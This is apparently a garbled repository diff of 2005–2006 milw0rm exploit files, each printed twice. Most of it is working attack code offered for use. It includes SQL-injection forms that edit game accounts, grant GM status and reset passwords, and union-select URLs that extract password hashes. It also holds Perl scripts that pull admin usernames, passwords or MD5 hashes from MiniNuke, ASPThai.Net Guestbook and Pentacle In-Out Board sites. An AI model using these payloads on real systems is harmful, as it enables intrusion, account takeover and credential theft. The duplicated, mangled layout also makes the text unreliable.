update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
|
||||
|
||||
Classcodes arE:
|
||||
0: Dark Wizard
|
||||
1: Soul Master
|
||||
16: Dark knight
|
||||
17: Blade knight
|
||||
32: Elf
|
||||
33: Muse Elf
|
||||
48: Magic Gladiator
|
||||
64: Dark Lord
|
||||
|
||||
Ctlcode is admin level code:
|
||||
0:Normal
|
||||
1: Blocked
|
||||
8: GM
|
||||
16: GM LVL2
|
||||
|
||||
-Blasting Vault-
|
||||
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
|
||||
|
||||
ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
|
||||
|
||||
-Changing Account Password-
|
||||
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
|
||||
Enjoy
|
||||
-->
|
||||
|
||||
<html>
|
||||
<form action="http://[SITE]/pkok.asp" method="post">
|
||||
<input type="hidden" name="username" value="notimportant">
|
||||
<input type="hidden" name="userchr" value="letzinject">
|
||||
<input name="pass" type="text" value="notimportant';[SQLCODE]">
|
||||
<input type="submit" name="submit" value="Do IT!">
|
||||
</form>
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2005-10-15]
|
||||
<!--
|
||||
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
|
||||
|
||||
Some SQL Examples:
|
||||
|
||||
-Changing character data-
|
||||
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
|
||||
|
||||
Classcodes arE:
|
||||
0: Dark Wizard
|
||||
1: Soul Master
|
||||
16: Dark knight
|
||||
17: Blade knight
|
||||
32: Elf
|
||||
33: Muse Elf
|
||||
48: Magic Gladiator
|
||||
64: Dark Lord
|
||||
|
||||
Ctlcode is admin level code:
|
||||
0:Normal
|
||||
1: Blocked
|
||||
8: GM
|
||||
16: GM LVL2
|
||||
|
||||
-Blasting Vault-
|
||||
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
|
||||
|
||||
ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
|
||||
|
||||
-Changing Account Password-
|
||||
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
|
||||
Enjoy
|
||||
-->
|
||||
|
||||
<html>
|
||||
<form action="http://[SITE]/pkok.asp" method="post">
|
||||
<input type="hidden" name="username" value="notimportant">
|
||||
<input type="hidden" name="userchr" value="letzinject">
|
||||
<input name="pass" type="text" value="notimportant';[SQLCODE]">
|
||||
<input type="submit" name="submit" value="Do IT!">
|
||||
</form>
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2005-10-15]
|
||||
|
|
|
@ -1,59 +1,59 @@
|
|||
Contacts:{
|
||||
ICQ: 10072
|
||||
MSN/Email: nukedx@nukedx.com
|
||||
Web: http://www.nukedx.com
|
||||
}
|
||||
|
||||
|
||||
---
|
||||
Vendor: MiniNuke (www.miniex.net)
|
||||
Version: 1.8.2 and prior versions must be affected.
|
||||
About:Via this method remote attacker can inject SQL query to the news.asp
|
||||
---
|
||||
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
|
||||
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
|
||||
|
||||
Columns of MEMBERS:
|
||||
uye_id = userid
|
||||
sifre = md5 password hash
|
||||
g_soru = secret question.
|
||||
g_cevap = secret answer
|
||||
email = mail address
|
||||
isim = name
|
||||
icq = ICQ Uin
|
||||
msn = MSN Sn.
|
||||
aim = AIM Sn.
|
||||
meslek = job
|
||||
cinsiyet = gender
|
||||
yas = age
|
||||
url = url
|
||||
imza = signature
|
||||
mail_goster = show mail :P
|
||||
avurl = avatar url
|
||||
avatar = avatar
|
||||
|
||||
|
||||
---
|
||||
Vendor: MiniNuke (www.miniex.net)
|
||||
Version: 1.8.2 and prior versions must be affected.
|
||||
About:Via this method remote attacker can change any users password without login.
|
||||
---
|
||||
How&Example:
|
||||
HTML Example
|
||||
[code]
|
||||
<html>
|
||||
<title>MiniNuke <= 1.8.2 remote user password change</title>
|
||||
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
|
||||
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
|
||||
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
|
||||
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
|
||||
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
|
||||
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
|
||||
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
|
||||
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">
|
||||
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
|
||||
</table></form>
|
||||
</html>
|
||||
[/code]
|
||||
|
||||
# milw0rm.com [2006-01-14]
|
||||
Contacts:{
|
||||
ICQ: 10072
|
||||
MSN/Email: nukedx@nukedx.com
|
||||
Web: http://www.nukedx.com
|
||||
}
|
||||
|
||||
|
||||
---
|
||||
Vendor: MiniNuke (www.miniex.net)
|
||||
Version: 1.8.2 and prior versions must be affected.
|
||||
About:Via this method remote attacker can inject SQL query to the news.asp
|
||||
---
|
||||
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
|
||||
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
|
||||
|
||||
Columns of MEMBERS:
|
||||
uye_id = userid
|
||||
sifre = md5 password hash
|
||||
g_soru = secret question.
|
||||
g_cevap = secret answer
|
||||
email = mail address
|
||||
isim = name
|
||||
icq = ICQ Uin
|
||||
msn = MSN Sn.
|
||||
aim = AIM Sn.
|
||||
meslek = job
|
||||
cinsiyet = gender
|
||||
yas = age
|
||||
url = url
|
||||
imza = signature
|
||||
mail_goster = show mail :P
|
||||
avurl = avatar url
|
||||
avatar = avatar
|
||||
|
||||
|
||||
---
|
||||
Vendor: MiniNuke (www.miniex.net)
|
||||
Version: 1.8.2 and prior versions must be affected.
|
||||
About:Via this method remote attacker can change any users password without login.
|
||||
---
|
||||
How&Example:
|
||||
HTML Example
|
||||
[code]
|
||||
<html>
|
||||
<title>MiniNuke <= 1.8.2 remote user password change</title>
|
||||
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
|
||||
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
|
||||
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
|
||||
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
|
||||
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
|
||||
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
|
||||
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
|
||||
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">
|
||||
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
|
||||
</table></form>
|
||||
</html>
|
||||
[/code]
|
||||
|
||||
# milw0rm.com [2006-01-14]
|
||||
|
|
|
@ -1,53 +1,53 @@
|
|||
#!/usr/bin/perl
|
||||
|
||||
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
|
||||
# This exploit uses the vulnerability discovered by nukedx@nukedx.com.
|
||||
# Exploit uses SQl-injection to give you the hash from user with chosen id.
|
||||
# DetMyl, 2006 Detmyl@bk.ru
|
||||
|
||||
use IO::Socket;
|
||||
|
||||
if (@ARGV < 3)
|
||||
{
|
||||
print q(
|
||||
+++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
|
||||
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
);
|
||||
exit;
|
||||
}
|
||||
$serv = $ARGV[0];
|
||||
$dir = $ARGV[1];
|
||||
$uid = $ARGV[2];
|
||||
$proxy = $ARGV[3];
|
||||
|
||||
print "----------------------------------\n";
|
||||
if ( defined $proxy) {
|
||||
$proxy =~ s/(http:\/\/)//eg;
|
||||
($proxyAddr,$proxyPort) = split(/:/, $proxy);
|
||||
}
|
||||
$serv =~ s/(http:\/\/)//eg;
|
||||
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
|
||||
print "Connecting to: $serv...\n";
|
||||
print $proxy?"Using proxy: $proxy \n":"";
|
||||
$socket = IO::Socket::INET->new( Proto => "tcp",
|
||||
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
|
||||
PeerPort => $proxyPort?"$proxyPort":"80")
|
||||
|| die "can't connect to: $serv\n";
|
||||
print $socket "GET $request HTTP/1.1\n";
|
||||
print $socket "Host: $serv\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
|
||||
print "+ Found! The hash for user $uid: $1\n";
|
||||
print "----------------------------------\n";
|
||||
exit(); }
|
||||
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
|
||||
}
|
||||
print "Exploit failed\n";
|
||||
print "--------------------------\n";
|
||||
|
||||
# milw0rm.com [2006-01-14]
|
||||
#!/usr/bin/perl
|
||||
|
||||
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
|
||||
# This exploit uses the vulnerability discovered by nukedx@nukedx.com.
|
||||
# Exploit uses SQl-injection to give you the hash from user with chosen id.
|
||||
# DetMyl, 2006 Detmyl@bk.ru
|
||||
|
||||
use IO::Socket;
|
||||
|
||||
if (@ARGV < 3)
|
||||
{
|
||||
print q(
|
||||
+++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
|
||||
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
);
|
||||
exit;
|
||||
}
|
||||
$serv = $ARGV[0];
|
||||
$dir = $ARGV[1];
|
||||
$uid = $ARGV[2];
|
||||
$proxy = $ARGV[3];
|
||||
|
||||
print "----------------------------------\n";
|
||||
if ( defined $proxy) {
|
||||
$proxy =~ s/(http:\/\/)//eg;
|
||||
($proxyAddr,$proxyPort) = split(/:/, $proxy);
|
||||
}
|
||||
$serv =~ s/(http:\/\/)//eg;
|
||||
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
|
||||
print "Connecting to: $serv...\n";
|
||||
print $proxy?"Using proxy: $proxy \n":"";
|
||||
$socket = IO::Socket::INET->new( Proto => "tcp",
|
||||
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
|
||||
PeerPort => $proxyPort?"$proxyPort":"80")
|
||||
|| die "can't connect to: $serv\n";
|
||||
print $socket "GET $request HTTP/1.1\n";
|
||||
print $socket "Host: $serv\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
|
||||
print "+ Found! The hash for user $uid: $1\n";
|
||||
print "----------------------------------\n";
|
||||
exit(); }
|
||||
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
|
||||
}
|
||||
print "Exploit failed\n";
|
||||
print "--------------------------\n";
|
||||
|
||||
# milw0rm.com [2006-01-14]
|
||||
|
|
|
@ -1,93 +1,93 @@
|
|||
#!/usr/bin/perl
|
||||
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
|
||||
#(And possible higher could not find a site to test it on)
|
||||
# This exploit shows the username of the administrator and the password In plain text
|
||||
# Bug Found by muderskillz Coded by Zodiac
|
||||
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
|
||||
# http://exploitercode.com/ http://www.g00ns.net
|
||||
#irc.g00ns.net #g00ns email = zodiac@g00ns.net
|
||||
#(c) 2006
|
||||
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Cookies;
|
||||
|
||||
$Server = $ARGV[0];
|
||||
|
||||
if($Server =~m/http/g)
|
||||
{
|
||||
$Server=~ 'http://$Server';
|
||||
print
|
||||
}
|
||||
else {
|
||||
print $error;
|
||||
}
|
||||
|
||||
if(!$Server) {usage();exit() ;}
|
||||
|
||||
head();
|
||||
|
||||
print "\r\nGrabbing Username And Password\r\n\n";
|
||||
|
||||
#Login's and stores a cookie to view admin panel later
|
||||
|
||||
|
||||
$xpl = LWP::UserAgent->new() or die;
|
||||
$cookie_jar = HTTP::Cookies->new();
|
||||
|
||||
$xpl->agent('g00ns');
|
||||
$xpl->cookie_jar($cookie_jar);
|
||||
|
||||
$res = $xpl->post(
|
||||
$Server.'check_user.asp',
|
||||
Content => [
|
||||
|
||||
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
|
||||
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
|
||||
'Submit' => '-= Login =-',
|
||||
],
|
||||
);
|
||||
|
||||
# Create a request
|
||||
my $req = HTTP::Request->new(GET =>
|
||||
|
||||
$Server.'change_admin_username.asp'
|
||||
|
||||
);
|
||||
|
||||
$req->header('Referer', $Server.'admin_menu.asp');
|
||||
|
||||
my $res = $xpl->request($req);
|
||||
|
||||
$info= $res->content;
|
||||
|
||||
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
|
||||
{
|
||||
die "Error Connecting...\r\n";
|
||||
}
|
||||
|
||||
#Check the outcome of the response
|
||||
|
||||
$info=~m/(value=\")(\n+|\w+|\W+)/g;
|
||||
$User = $2;
|
||||
$info=~m/(value=\")(\n+|\w+|\W+)/g;
|
||||
$Pass= $2;
|
||||
|
||||
print "UserName:$User\r\nPassword:$Pass\r\n";
|
||||
|
||||
sub head()
|
||||
{
|
||||
print "\n=======================================================================\r\n";
|
||||
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
|
||||
print "=======================================================================\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
head();
|
||||
print " Usage: Thaisql.pl <Site> \r\n\n";
|
||||
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
|
||||
print "=======================================================================\r\n";
|
||||
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
|
||||
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
|
||||
print "=======================================================================\r\n";
|
||||
|
||||
# milw0rm.com [2006-02-06]
|
||||
#!/usr/bin/perl
|
||||
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
|
||||
#(And possible higher could not find a site to test it on)
|
||||
# This exploit shows the username of the administrator and the password In plain text
|
||||
# Bug Found by muderskillz Coded by Zodiac
|
||||
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
|
||||
# http://exploitercode.com/ http://www.g00ns.net
|
||||
#irc.g00ns.net #g00ns email = zodiac@g00ns.net
|
||||
#(c) 2006
|
||||
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Cookies;
|
||||
|
||||
$Server = $ARGV[0];
|
||||
|
||||
if($Server =~m/http/g)
|
||||
{
|
||||
$Server=~ 'http://$Server';
|
||||
print
|
||||
}
|
||||
else {
|
||||
print $error;
|
||||
}
|
||||
|
||||
if(!$Server) {usage();exit() ;}
|
||||
|
||||
head();
|
||||
|
||||
print "\r\nGrabbing Username And Password\r\n\n";
|
||||
|
||||
#Login's and stores a cookie to view admin panel later
|
||||
|
||||
|
||||
$xpl = LWP::UserAgent->new() or die;
|
||||
$cookie_jar = HTTP::Cookies->new();
|
||||
|
||||
$xpl->agent('g00ns');
|
||||
$xpl->cookie_jar($cookie_jar);
|
||||
|
||||
$res = $xpl->post(
|
||||
$Server.'check_user.asp',
|
||||
Content => [
|
||||
|
||||
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
|
||||
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
|
||||
'Submit' => '-= Login =-',
|
||||
],
|
||||
);
|
||||
|
||||
# Create a request
|
||||
my $req = HTTP::Request->new(GET =>
|
||||
|
||||
$Server.'change_admin_username.asp'
|
||||
|
||||
);
|
||||
|
||||
$req->header('Referer', $Server.'admin_menu.asp');
|
||||
|
||||
my $res = $xpl->request($req);
|
||||
|
||||
$info= $res->content;
|
||||
|
||||
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
|
||||
{
|
||||
die "Error Connecting...\r\n";
|
||||
}
|
||||
|
||||
#Check the outcome of the response
|
||||
|
||||
$info=~m/(value=\")(\n+|\w+|\W+)/g;
|
||||
$User = $2;
|
||||
$info=~m/(value=\")(\n+|\w+|\W+)/g;
|
||||
$Pass= $2;
|
||||
|
||||
print "UserName:$User\r\nPassword:$Pass\r\n";
|
||||
|
||||
sub head()
|
||||
{
|
||||
print "\n=======================================================================\r\n";
|
||||
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
|
||||
print "=======================================================================\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
head();
|
||||
print " Usage: Thaisql.pl <Site> \r\n\n";
|
||||
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
|
||||
print "=======================================================================\r\n";
|
||||
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
|
||||
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
|
||||
print "=======================================================================\r\n";
|
||||
|
||||
# milw0rm.com [2006-02-06]
|
||||
|
|
|
@ -1,50 +1,50 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
|
||||
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 3){
|
||||
print "
|
||||
+**********************************************************************+
|
||||
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
|
||||
+ Usage: mini.pl <victim> <directory> <userid> +
|
||||
+ Example: mini.pl sux.com / 1 +
|
||||
+ Method found & Exploit scripted by nukedx +
|
||||
+**********************************************************************+
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$port = "80";
|
||||
$mndir = $ARGV[1];
|
||||
$victimid = $ARGV[2];
|
||||
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $mns "GET $sreq\n";
|
||||
print $mns "Host: $server\n";
|
||||
print $mns "Accept: */*\n";
|
||||
print $mns "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$mns>) {
|
||||
if ($answer =~ /([\d,a-f]{32})/) {
|
||||
print "+ USERID: $victimid\n";
|
||||
print "+ MD5 HASH: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit(); }
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
|
||||
print "+ So please edit query by manually adding null data..\n";
|
||||
exit(); }
|
||||
}
|
||||
print "+ Exploit failed\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# nukedx.com [2006-02-19]
|
||||
|
||||
# milw0rm.com [2006-02-19]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
|
||||
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 3){
|
||||
print "
|
||||
+**********************************************************************+
|
||||
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
|
||||
+ Usage: mini.pl <victim> <directory> <userid> +
|
||||
+ Example: mini.pl sux.com / 1 +
|
||||
+ Method found & Exploit scripted by nukedx +
|
||||
+**********************************************************************+
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$port = "80";
|
||||
$mndir = $ARGV[1];
|
||||
$victimid = $ARGV[2];
|
||||
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $mns "GET $sreq\n";
|
||||
print $mns "Host: $server\n";
|
||||
print $mns "Accept: */*\n";
|
||||
print $mns "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$mns>) {
|
||||
if ($answer =~ /([\d,a-f]{32})/) {
|
||||
print "+ USERID: $victimid\n";
|
||||
print "+ MD5 HASH: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit(); }
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
|
||||
print "+ So please edit query by manually adding null data..\n";
|
||||
exit(); }
|
||||
}
|
||||
print "+ Exploit failed\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# nukedx.com [2006-02-19]
|
||||
|
||||
# milw0rm.com [2006-02-19]
|
||||
|
|
|
@ -1,70 +1,70 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Usage: penta.pl <victim> <directory>
|
||||
#Original Advisory: http://www.nukedx.com/?viewdoc=14
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
+***********************************************************************+
|
||||
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
|
||||
+ Usage: penta.pl <victim> <directory> <userid> +
|
||||
+ Example: penta.pl sux.com / 1 +
|
||||
+ Method found & Exploit scripted by nukedx +
|
||||
+***********************************************************************+
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$pentaserver = $ARGV[0];
|
||||
$pentaserver =~ s/(http:\/\/)//eg;
|
||||
$pentahost = "http://".$pentaserver;
|
||||
$port = "80";
|
||||
$pentadir = $ARGV[1];
|
||||
$pentaid = $ARGV[2];
|
||||
$pentatar = "newsdetailsview.asp?newsid=";
|
||||
$pentafinal = "login.asp";
|
||||
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
|
||||
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $pentaserver\n";
|
||||
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $penta "GET $pentareq\n";
|
||||
print $penta "Host: $pentaserver\n";
|
||||
print $penta "Accept: */*\n";
|
||||
print $penta "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$penta>) {
|
||||
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
|
||||
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ USERNAME: $1\n";
|
||||
}
|
||||
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?) /) {
|
||||
print "+ PASSWORD: $1\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "+ Try another userid maybe this one not the admin.\n";
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# nukedx.com [2006-02-25]
|
||||
|
||||
# milw0rm.com [2006-02-25]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Usage: penta.pl <victim> <directory>
|
||||
#Original Advisory: http://www.nukedx.com/?viewdoc=14
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
+***********************************************************************+
|
||||
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
|
||||
+ Usage: penta.pl <victim> <directory> <userid> +
|
||||
+ Example: penta.pl sux.com / 1 +
|
||||
+ Method found & Exploit scripted by nukedx +
|
||||
+***********************************************************************+
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$pentaserver = $ARGV[0];
|
||||
$pentaserver =~ s/(http:\/\/)//eg;
|
||||
$pentahost = "http://".$pentaserver;
|
||||
$port = "80";
|
||||
$pentadir = $ARGV[1];
|
||||
$pentaid = $ARGV[2];
|
||||
$pentatar = "newsdetailsview.asp?newsid=";
|
||||
$pentafinal = "login.asp";
|
||||
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
|
||||
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $pentaserver\n";
|
||||
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $penta "GET $pentareq\n";
|
||||
print $penta "Host: $pentaserver\n";
|
||||
print $penta "Accept: */*\n";
|
||||
print $penta "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$penta>) {
|
||||
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
|
||||
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ USERNAME: $1\n";
|
||||
}
|
||||
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?) /) {
|
||||
print "+ PASSWORD: $1\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "+ Try another userid maybe this one not the admin.\n";
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# nukedx.com [2006-02-25]
|
||||
|
||||
# milw0rm.com [2006-02-25]
|
||||
|
|
|
@ -1,36 +1,36 @@
|
|||
<html>
|
||||
